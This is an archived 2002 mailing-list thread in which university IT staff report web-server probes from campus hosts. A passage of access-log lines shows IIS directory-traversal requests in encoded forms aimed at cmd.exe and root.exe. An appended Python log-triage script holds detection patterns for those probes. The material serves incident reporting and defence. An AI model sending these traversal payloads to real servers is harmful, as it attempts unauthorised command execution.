Not to be a "me-too"er but I have noticed the same from the same IP
addresses on one of our Windows boxes. ZoneAlarm showed approximately
400 alerts since 6pm Friday until 8am this morning.




Paul Donahue
Lead Computer/Network Technician
CVM Information Technology Center
A227 VMC, Michigan State University
Phone:  353-5551   Fax:  432-2937

>>> [log in to unmask] 01/21/02 08:51AM >>>
Probes from these hosts started coming in just before 11:00pm Saturday
night:

35.8.164.90 - bigone.hrt.msu.edu
35.8.33.189 - fpc04.nscl.msu.edu
35.8.34.114 - cycpc54.nscl.msu.edu
35.8.33.203 - talon.nscl.msu.edu
35.8.107.198 - No host name in DNS. Domain: llc,
  Language Learning Center in Old Hort


Probe examples:

35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 286
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 327
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 327
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 343
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 293
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 293
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310

--
Gene Willacker, Systems Analyst
MSU Division of Housing and Food Service
Food Stores Building
171 Service Road
East Lansing, MI 48824-1233
517-353-1691
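
Added example, not part of either message above: one way to triage an access log for probes like the ones quoted, grouping them by source host and flagging any that were not answered with a 4xx status. The function names, trait labels and sample entries are assumptions made for this illustration, and it expects one log entry per line (not mail-wrapped).

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote

# Common Log Format: host ident user [time] "METHOD path PROTO" status bytes
CLF = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) \S+$')
SHELL = re.compile(r'/(?:cmd|root)\.exe', re.I)
# C0/C1 are never valid UTF-8 lead bytes (overlong/malformed forms, e.g. %c0%af for "/").
BAD_UTF8 = re.compile(r'%c[01]%[0-9a-f]{2}', re.I)
TRAVERSAL = re.compile(r'\.\.[\\/]')

def classify(path):
    """Return the set of probe traits (labels are this example's own) in a path."""
    if not SHELL.search(path):
        return set()
    traits = {"shell-exe"}
    if BAD_UTF8.search(path):
        traits.add("invalid-utf8")
    once, twice = unquote(path), unquote(unquote(path))
    # Double encoding: a second decode exposes ..\ or ../ that the first did not.
    if len(TRAVERSAL.findall(twice)) > len(TRAVERSAL.findall(once)):
        traits.add("double-encoded")
    return traits

def summarize(lines):
    """Per source host: probe count, trait counts, and requests not answered 4xx."""
    report = defaultdict(lambda: {"probes": 0, "traits": Counter(), "served": []})
    for line in lines:
        m = CLF.match(line.strip())
        traits = classify(m.group(2)) if m else set()
        if not traits:
            continue
        entry = report[m.group(1)]
        entry["probes"] += 1
        entry["traits"].update(traits)
        if not 400 <= int(m.group(3)) < 500:  # anything but 4xx needs a closer look
            entry["served"].append((int(m.group(3)), m.group(2)))
    return dict(report)

# Constructed sample entries modelled on the probes above (TEST-NET addresses).
SAMPLE = [
    '192.0.2.10 - - [21/Jan/2002:08:37:14 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310',
    '192.0.2.10 - - [21/Jan/2002:08:37:14 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309',
    '192.0.2.10 - - [21/Jan/2002:08:37:14 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 286',
    '192.0.2.77 - - [21/Jan/2002:08:40:02 -0500] "GET /index.html HTTP/1.0" 200 1042',
]

if __name__ == "__main__":
    print(summarize(SAMPLE))
```

An empty "served" list for a host means every probe from it drew a 400 or 404, as in the log excerpt above.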